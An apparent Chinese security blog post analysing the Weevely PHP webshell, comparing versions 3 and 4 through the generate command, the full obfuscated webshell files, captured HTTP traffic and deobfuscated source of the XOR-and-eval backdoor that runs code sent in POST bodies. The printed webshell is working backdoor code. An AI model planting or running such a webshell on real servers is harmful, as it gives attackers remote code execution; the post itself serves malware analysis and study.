Weevely代码分析

亲测php5和php8都无效,只有php7有效

ailx10

1949 次咨询

4.9

网络安全优秀回答者

互联网行业 安全攻防员

去咨询

上一次做weevely实验可以追溯到2020年,当时还是weevely3.7,现在的是weevely4 生成php网页木马依然差不多......

php菜刀weevely的简单实验19 赞同 · 3 评论文章​编辑

生成webshell文件的方式还是一样的

复制代码
weevely generate ailx10 webshell.php

格式如下:

复制代码
<?php
$k='=|=|(=|=|$j<$c&&$i<$l);$j++,$i++=|){$o.==|$=|=|=|t{$i}^$k{$j};}}return $o=|;}if =|=|(@preg_matc=|h=';
$o=str_replace('h','','chreahtehh_fhunhction');
$M='_end_clea=|=|n=|();$r=@=|bas=|e64_e=|ncode(@x(@=|gz=|compress($o),$=|k));print("$=|p=|$kh$r$kf");}';
$B=';func=|tion x($t,=|$k){$c=s=|t=|rlen($k);$l=s=|trlen(=|$t=|);$o=|=|="";for($i=|=0;$i<$l;){for=|($j=0;';
$g='$k="8=|3b70504";=|$kh="e=|0d8742=|dd5b6"=|;$k=|f="6e696=|2=|eb8a35";$p="=|6Dn1Vri=|K6eU=|iVd=|=|CB"';
$E='val(@gzuncom=|press=|(@x(@b=|=|ase64_decod=|e($m=|[1]),$k)=|=|));$o=@ob_get_=|con=|tents(=|=|);@ob';
$R='|("/$kh(.+)$=|kf/",@f=|=|ile_get_co=|ntents("=|=|php://in=|=|put"),$m)==1) {@o=|b_s=|tart();@=|e=|';
$v=str_replace('=|','',$g.$B.$k.$R.$E.$M);
$X=$o('',$v);$X();
?>

对比一下weevely3

复制代码
<?php
$z='"a~;funca~tion x($a~ta~,$k){$c=a~strlen($k)a~;$la~=a~strlen(a~$t);$oa~a~="a~";for($i=0;$i<$l;){f';
$S='reg_matca~a~h("/$kh(a~.+a~)$kf/",@fa~ile_geta~_a~contents("a~pa~ha~p://inpua~t"),$m)==1){@ob_sa~';
$c=str_replace('K','','crKKeateK_fKunKKction');
$G='tart();@ea~val(@ga~za~uncompra~essa~(@x(a~@base6a~4_decoda~e($m[1]),$k)))a~a~;$a~a~o=@ob_ga~et_contents();a~@ob';
$X='_end_cleaa~n(a~);$r=@baa~se64_ena~ca~oa~de(@x(@gzcomprea~ss($o),$ka~));pa~a~rint(a~"$p$kh$r$kf");}';
$D='or($j=a~a~a~0;($j<$c&&$i<$l);$a~j++,$a~i++){$o.a~=$t{a~$i}^$a~a~k{$j};a~}}retua~rna~ $o;}if(@p';
$Y='$ka~="83ba~70504a~";$kh="ea~0a~d8742a~dd5b6";$kf="6a~e6962a~eb8a3a~5";$p="B1LWa~FZL8ia~ThxpsWa~b';
$g=str_replace('a~','',$Y.$z.$D.$S.$G.$X);
$e=$c('',$g);$e();
?>

wireshark 抓包分析,第一个http请求分析和应答分析

weevely3第一个http请求

复制代码
 S3GQ#]g2:gmrV; e0d8742dd5b6QK8pev795wQMglKA5IE2NC/IYQ46e6962eb8a35g`,nMD4E DE0 {g(

weevely3第一个http应答

复制代码
8mxY44h2cwP5HCvee0d8742dd5b6QK9RA4EFhzA4MHs2Pg==6e6962eb8a35

再来看一下weevely4

weevely4第一个http请求

复制代码
kV8v2J'|Ww2q59QKe0d8742dd5b6QK8pev795wQMBtcD4IE2NC/sYQc6e6962eb8a351) _TH<qL"g#GObZ

weevely4第一个http应答

复制代码
Crq5Lait6en1SFoOe0d8742dd5b6QK9RAwWABDQ4MG02NQ==6e6962eb8a35\n

weevely3代码分析,都是匿名函数

weevely3代码分析

复制代码
$k="83b70504";$kh="e0d8742dd5b6";
$kf="6e6962eb8a35";$p="8mxY44h2cwP5HCve";
function x($t,$k)
{$c=strlen($k);$l=strlen($t);$o="";
for($i=0;$i<$l;)
{for($j=0;($j<$c&&$i<$l);$j++,$i++)
{$o.=$t{$i}^$k{$j};}}return $o;}
if(@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1)
{@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");}

weevely4代码分析,都是匿名函数

weevely4代码分析

复制代码
$k="83b70504";$kh="e0d8742dd5b6";
$kf="6e6962eb8a35";$p="Crq5Lait6en1SFoO";
function x($t,$k)
{$c=strlen($k);$l=strlen($t);$o="";
for($i=0;$i<$l;)
{for($j=0;($j<$c&&$i<$l);$j++,$i++)
{$o.=$t{$i}^$k{$j};}}return $o;}
if (@preg_match("/$kh(.+)$kf/",@file_get_contents("php://input"),$m)==1) 
{@ob_start();@eval(@gzuncompress(@x(@base64_decode($m[1]),$k)));
$o=@ob_get_contents();@ob_end_clean();
$r=@base64_encode(@x(@gzcompress($o),$k));
print("$p$kh$r$kf");}

发布于 2022-10-13 10:33

相关推荐
一只鹿鹿鹿7 小时前
【网络安全】信息网络安全建设方案(WORD)
人工智能·安全·spring·web安全·低代码
JQLvopkk8 小时前
Web安全学习步骤
网络安全
卓码软件测评8 小时前
软件测评中网站类测评测试使用的BurpSuite-Web安全测试流程
测试工具·安全·web安全
爱学习的大牛1238 小时前
网络安全专业知识体系:成为专家需要做的
安全·web安全
吃不得辣条8 小时前
网络安全之防火墙
网络·web安全·apache
网安Ruler8 小时前
Web开发-PHP应用&Cookie脆弱&Session固定&Token唯一&身份验证&数据库通讯
前端·数据库·网络安全·php·渗透·红队
编程到天明8 小时前
CTF实战:用Sqlmap破解表单输入型SQL注入题(输入账号密码/username&password)
sql·网络安全·web
m0_7381207211 小时前
Solar月赛(应急响应)——攻击者使用什么漏洞获取了服务器的配置文件?
运维·服务器·安全·web安全·网络安全
Status_50015 小时前
XSS跨站脚本攻击详解
web安全·xss
卓码软件测评15 小时前
软件测试测评公司关于HTTP安全头配置与测试?
web安全·网络安全·安全性测试·web app